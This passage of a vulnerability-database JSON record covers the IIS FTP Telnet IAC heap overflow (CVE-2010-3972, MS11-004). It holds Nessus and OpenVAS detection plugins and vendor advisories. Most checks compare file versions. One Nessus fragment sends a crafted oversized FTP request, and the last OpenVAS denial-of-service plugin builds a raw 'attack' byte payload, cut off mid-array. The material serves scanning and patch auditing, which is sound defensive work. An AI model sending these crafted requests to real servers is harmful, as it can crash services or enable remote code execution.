+= raw_string(0xff,0xff);\ndata += crap(data:'B', length:8);\n\nsend(socket:soc, data:data);\n\nres = ftp_recv_line(socket:soc);\nif (isnull(res)) exit(1,\"The FTP service on port \"+port+\" did not respond.\");\n\n# vulnerable\nif(res =~ '^01 *\\'A{4090}\\xff\\xffB{5}')\n security_hole(port);\n# patched\nelse if (res =~'^501 *\\'A{4090}\\xffB{5}')\n exit(0,\"The Microsoft FTP service on port \"+port+\" is patched.\");\n# FTP 6.0 on vista_sp1_x86 and win2008_sp1_x64 returned \"421 Terminating connection.\"\nelse if(res =~ \"Terminating connection\")\n exit(0,\"The FTP service on port \"+port+\" is not affected (possibly Microsoft FTP Service 6.0).\");\n# FTP 5.1 on xp_sp3_x86 returned \"500 Command was too long\"\nelse if(res =~ \"Command was too long\")\n exit(0,\"The FTP service on port \"+port+\" is not affected (possibly Microsoft FTP Service 5.1).\");\nelse exit(1,'The FTP service on port \"+port+\" sent an unexpected return ('+res+').');\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T13:02:00", "description": "The IIS FTP service running on the remote host has a heap-based buffer overflow vulnerability. The 'TELNET_STREAM_CONTEXT::OnSendData' function fails to properly sanitize user input, resulting in a buffer overflow.\n\nAn unauthenticated, remote attacker can exploit this to execute arbitrary code.", "cvss3": {"score": null, "vector": null}, "published": "2011-02-08T00:00:00", "type": "nessus", "title": "MS11-004: Vulnerability in Internet Information Services (IIS) FTP Service Could Allow Remote Code Execution (2489256)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-3972"], "modified": "2018-11-15T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS11-004.NASL", "href": "https://www.tenable.com/plugins/nessus/51904", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(51904);\n script_version(\"1.22\");\n script_cvs_date(\"Date: 2018/11/15 20:50:30\");\n\n script_cve_id(\"CVE-2010-3972\");\n script_bugtraq_id(45542);\n script_xref(name:\"EDB-ID\", value:\"15803\");\n script_xref(name:\"MSFT\", value:\"MS11-004\");\n script_xref(name:\"MSKB\", value:\"2489256\");\n\n script_name(english:\"MS11-004: Vulnerability in Internet Information Services (IIS) FTP Service Could Allow Remote Code Execution (2489256)\");\n script_summary(english:\"Checks version of ftpsvc.dll\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The FTP service running on the remote host has a memory corruption\nvulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The IIS FTP service running on the remote host has a heap-based buffer\noverflow vulnerability. The 'TELNET_STREAM_CONTEXT::OnSendData'\nfunction fails to properly sanitize user input, resulting in a buffer\noverflow.\n\nAn unauthenticated, remote attacker can exploit this to execute\narbitrary code.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2011/ms11-004\");\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Microsoft has released a set of patches for Windows Vista, 2008, 2008\nR2, and 7.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\nscript_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/12/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/02/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/02/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"smb_enum_services.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 'Host/patch_management_checks');\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS11-004';\nkb = '2489256';\n\nkbs = make_list(kb);\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nget_kb_item_or_exit('SMB/svc/ftpsvc'); # cheap way to see if FTP 7.0/7.5 is installed\n\nif (hotfix_check_sp_range(vista:'1,2', win7:'0,1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nrootfile = hotfix_get_systemroot();\nif (!rootfile) exit(1, \"Failed to get the system root.\");\n\nshare = hotfix_path2share(path:rootfile);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\n# Remote version : 7.5.7600.14978\n# Should be : 7.5.7600.16748\n\nif (\n # FTP 7.5 on IIS 7.5\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"ftpsvc.dll\", version:\"7.5.7601.21649\", min_version:\"7.5.7601.21000\", dir:\"\\system32\\inetsrv\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"ftpsvc.dll\", version:\"7.5.7601.17550\", min_version:\"7.5.7601.0\", dir:\"\\system32\\inetsrv\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:0, file:\"ftpsvc.dll\", version:\"7.5.7600.20888\", min_version:\"7.5.7600.20000\", dir:\"\\system32\\inetsrv\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:0, file:\"ftpsvc.dll\", version:\"7.5.7600.16748\", min_version:\"7.5.0.0\", dir:\"\\system32\\inetsrv\", bulletin:bulletin, kb:kb) ||\n\n # FTP 7.5 on IIS 7.0 (LDR not listed in KB article)\n hotfix_is_vulnerable(os:\"6.0\", file:\"ftpsvc.dll\", version:\"7.5.7600.14978\", min_version:\"7.5.0.0\", dir:\"\\system32\\inetsrv\", bulletin:bulletin, kb:kb) ||\n\n # FTP 7.0 on IIS 7.0 (LDR not listed in KB article)\n hotfix_is_vulnerable(os:\"6.0\", file:\"ftpsvc.dll\", version:\"7.0.6545.14979\", min_version:\"7.0.0.0\", dir:\"\\system32\\inetsrv\", bulletin:bulletin, kb:kb)\n)\n{\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:56:08", "description": "A heap buffer overflow vulnerability exists within the Microsoft Internet Information Services (IIS) FTP Service. The vulnerability is due to a memory corruption encountered when encoding Telnet IAC characters in a FTP response. A remote unauthenticated attacker may exploit this vulnerability by sending a crafted FTP request to a target server. Successful exploitation can lead to execution of arbitrary code or a denial of service condition of FTP services.", "cvss3": {}, "published": "2014-11-27T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft IIS FTP Server Telnet IAC Buffer Overflow (CVE-2010-3972)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3972"], "modified": "2015-11-10T00:00:00", "id": "CPAI-2014-2245", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-04T20:10:17", "description": "A heap buffer overflow vulnerability has been reported within the Microsoft Internet Information Services (IIS) FTP Service. IIS is a collection of Internet services packaged with several versions of the Windows operating system. IIS includes a FTP server service for exchanging and manipulating files over a TCP computer network. A remote attacker could use this vulnerability to cause a heap-based buffer overflow and execute arbitrary code on an affected system.", "cvss3": {}, "published": "2010-12-26T00:00:00", "type": "checkpoint_advisories", "title": "Preemptive Protection against Microsoft IIS FTP Server Telnet IAC Buffer Overflow Vulnerability (MS11-004)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3972"], "modified": "2010-12-30T00:00:00", "id": "CPAI-2010-351", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-06-10T20:01:14", "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS11-004.", "cvss3": {}, "published": "2011-02-09T00:00:00", "type": "openvas", "title": "Internet Information Services (IIS) FTP Service Remote Code Execution Vulnerability (2489256)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-3972"], "modified": "2020-06-09T00:00:00", "id": "OPENVAS:1361412562310901183", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310901183", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Internet Information Services (IIS) FTP Service Remote Code Execution Vulnerability (2489256)\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2011 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.901183\");\n script_version(\"2020-06-09T10:15:40+0000\");\n script_cve_id(\"CVE-2010-3972\");\n script_bugtraq_id(45542);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-09 10:15:40 +0000 (Tue, 09 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2011-02-09 17:14:46 +0100 (Wed, 09 Feb 2011)\");\n script_name(\"Internet Information Services (IIS) FTP Service Remote Code Execution Vulnerability (2489256)\");\n script_xref(name:\"URL\", value:\"http://www.kb.cert.org/vuls/id/842372\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/15803/\");\n script_xref(name:\"URL\", value:\"http://www.securitytracker.com/id?1024921\");\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2010/3305\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2011 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_reg_enum.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/registry_enumerated\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation could allow remote attackers to cause a denial of\n service and possibly execute arbitrary code via a crafted FTP request that\n triggers memory corruption.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Internet Information Services (IIS) version 7.0 on Microsoft Windows Vista/2008 server Service Pack 2 and prior\n\n - Microsoft Internet Information Services (IIS) version 7.5 on Microsoft Windows 7 Service Pack 1 and prior\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to a boundary error when encoding Telnet IAC\n characters in a FTP response. This can be exploited without authenticating\n to the FTP service to cause a heap-based buffer overflow by sending an overly\n long, specially crafted FTP request.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security update according to\n Microsoft Bulletin MS11-004.\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/security-updates/securitybulletins/2011/ms11-004\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(winVista:3, win2008:3, win7:2) <= 0){\n exit(0);\n}\n\n## MS11-004 Hotfix (2489256)\nif(hotfix_missing(name:\"2489256\") == 0){\n exit(0);\n}\n\nsysPath = smb_get_systemroot();\nif(!sysPath ){\n exit(0);\n}\n\ndllVer = fetch_file_version(sysPath:sysPath, file_name:\"system32\\inetsrv\\ftpsvc.dll\");\nif(!dllVer){\n exit(0);\n}\n\nif(hotfix_check_sp(winVista:3, win2008:3) > 0)\n{\n if(version_in_range(version:dllVer, test_version:\"7.0\", test_version2:\"7.0.6545.14978\")||\n version_in_range(version:dllVer, test_version:\"7.5.7600.0\", test_version2:\"7.5.7600.14977\")||\n version_in_range(version:dllVer, test_version:\"7.5.7055.0\", test_version2:\"7.5.7055.14309\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n}\n\nelse if(hotfix_check_sp(win7:2) > 0)\n{\n if(version_is_less(version:dllVer, test_version:\"7.5.7600.16748\") ||\n version_in_range(version:dllVer, test_version:\"7.5.7600.20000\", test_version2:\"7.5.7600.20887\")||\n version_in_range(version:dllVer, test_version:\"7.5.7601.17000\", test_version2:\"7.5.7601.17549\")||\n version_in_range(version:dllVer, test_version:\"7.5.7601.21000\", test_version2:\"7.5.7601.21648\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-10-30T10:53:51", "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS11-004.", "cvss3": {}, "published": "2011-02-09T00:00:00", "type": "openvas", "title": "Internet Information Services (IIS) FTP Service Remote Code Execution Vulnerability (2489256)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-3972"], "modified": "2017-10-26T00:00:00", "id": "OPENVAS:901183", "href": "http://plugins.openvas.org/nasl.php?oid=901183", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_ms11-004.nasl 7582 2017-10-26 11:56:51Z cfischer $\n#\n# Internet Information Services (IIS) FTP Service Remote Code Execution Vulnerability (2489256)\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation could allow remote attackers to cause a denial of\n service and possibly execute arbitrary code via a crafted FTP request that\n triggers memory corruption.\n Impact Level: System/Application\";\ntag_affected = \"Microsoft Internet Information Services (IIS) version 7.0\n - On Microsoft Windows Vista/2008 server Service Pack 2 and prior\n Microsoft Internet Information Services (IIS) version 7.5\n - On Microsoft Windows 7 Service Pack 1 and prior\";\ntag_insight = \"The flaw is due to a boundary error when encoding Telnet IAC\n characters in a FTP response. This can be exploited without authenticating\n to the FTP service to cause a heap-based buffer overflow by sending an overly\n long, specially crafted FTP request.\";\ntag_solution = \"Run Windows Update and update the listed hotfixes or download and\n update mentioned hotfixes in the advisory from the below link,\n http://www.microsoft.com/technet/security/bulletin/ms11-004.mspx\";\ntag_summary = \"This host is missing a critical security update according to\n Microsoft Bulletin MS11-004.\";\n\nif(description)\n{\n script_id(901183);\n script_version(\"$Revision: 7582 $\");\n script_cve_id(\"CVE-2010-3972\");\n script_bugtraq_id(45542);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-10-26 13:56:51 +0200 (Thu, 26 Oct 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-02-09 17:14:46 +0100 (Wed, 09 Feb 2011)\");\n script_name(\"Internet Information Services (IIS) FTP Service Remote Code Execution Vulnerability (2489256)\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/42713\");\n script_xref(name : \"URL\" , value : \"http://www.kb.cert.org/vuls/id/842372\");\n script_xref(name : \"URL\" , value : \"http://www.exploit-db.com/exploits/15803/\");\n script_xref(name : \"URL\" , value : \"http://www.securitytracker.com/id?1024921\");\n script_xref(name : \"URL\" , value : \"http://www.vupen.com/english/advisories/2010/3305\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2011 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_reg_enum.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n## Check for OS and Service Pack\nif(hotfix_check_sp(winVista:3, win2008:3, win7:2) <= 0){\n exit(0);\n}\n\n## MS11-004 Hotfix (2489256)\nif(hotfix_missing(name:\"2489256\") == 0){\n exit(0);\n}\n\n## Get System Path\nsysPath = smb_get_systemroot();\nif(!sysPath ){\n exit(0);\n}\n\n## Get Version from Ftpsvc.dll file\ndllVer = fetch_file_version(sysPath, file_name:\"system32\\inetsrv\\ftpsvc.dll\");\nif(!dllVer){\n exit(0);\n}\n\n## Windows Vista and Windows Server 2008\nif(hotfix_check_sp(winVista:3, win2008:3) > 0)\n{\n ## Check for Ftpsvc.dll version\n if(version_in_range(version:dllVer, test_version:\"7.0\", test_version2:\"7.0.6545.14978\")||\n version_in_range(version:dllVer, test_version:\"7.5.7600.0\", test_version2:\"7.5.7600.14977\")||\n version_in_range(version:dllVer, test_version:\"7.5.7055.0\", test_version2:\"7.5.7055.14309\")){\n security_message(0);\n }\n exit(0);\n}\n\n## Windows 7\nelse if(hotfix_check_sp(win7:2) > 0)\n{\n ## Check for Ftpsvc.dll version\n if(version_is_less(version:dllVer, test_version:\"7.5.7600.16748\") ||\n version_in_range(version:dllVer, test_version:\"7.5.7600.20000\", test_version2:\"7.5.7600.20887\")||\n version_in_range(version:dllVer, test_version:\"7.5.7601.17000\", test_version2:\"7.5.7601.17549\")||\n version_in_range(version:dllVer, test_version:\"7.5.7601.21000\", test_version2:\"7.5.7601.21648\")){\n security_message(0);\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-06-10T20:03:04", "description": "This host is running Microsoft IIS with FTP server and is prone to\n Denial of service vulnerability.", "cvss3": {}, "published": "2010-12-27T00:00:00", "type": "openvas", "title": "Microsoft Windows IIS FTP Server DOS Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-3972"], "modified": "2020-06-09T00:00:00", "id": "OPENVAS:1361412562310801669", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310801669", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows IIS FTP Server DOS Vulnerability\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Updated By : Sooraj KS <kssooraj@secpod.com> on 2011-04-12\n# Updated to detect vulnerable patterns.\n#\n# Copyright:\n# Copyright (C) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.801669\");\n script_version(\"2020-06-09T10:15:40+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-09 10:15:40 +0000 (Tue, 09 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2010-12-27 09:55:05 +0100 (Mon, 27 Dec 2010)\");\n script_cve_id(\"CVE-2010-3972\");\n script_bugtraq_id(45542);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Microsoft Windows IIS FTP Server DOS Vulnerability\");\n script_category(ACT_DENIAL);\n script_copyright(\"Copyright (C) 2010 Greenbone Networks GmbH\");\n script_family(\"Denial of Service\");\n script_dependencies(\"ftpserver_detect_type_nd_version.nasl\");\n script_require_ports(\"Services/ftp\", 21);\n script_mandatory_keys(\"ftp/microsoft/iis_ftp/detected\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/42713\");\n script_xref(name:\"URL\", value:\"http://www.kb.cert.org/vuls/id/842372\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/15803/\");\n script_xref(name:\"URL\", value:\"http://www.securitytracker.com/id?1024921\");\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2010/3305\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation may allow remote attackers to execute arbitrary code\n on the system or cause the application to crash.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 7 IIS 7.5 FTP Server.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to a boundary error when encoding Telnet IAC\n characters in a FTP response. This can be exploited without authenticating\n to the FTP service to cause a heap-based buffer overflow by sending an overly\n long, specially crafted FTP request.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"summary\", value:\"This host is running Microsoft IIS with FTP server and is prone to\n Denial of service vulnerability.\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/security-updates/securitybulletins/2011/ms11-004\");\n exit(0);\n}\n\ninclude(\"ftp_func.inc\");\ninclude(\"misc_func.inc\");\n\nftpPort = ftp_get_port( default:21 );\n\nbanner = ftp_get_banner(port:ftpPort);\nif(!banner || \"Microsoft FTP Service\" >!< banner)\n exit(0);\n\nsoc = open_sock_tcp(ftpPort);\nif(!soc){\n exit(0);\n}\n\nattack = raw_string(\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,\n0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,\n0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,\n0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 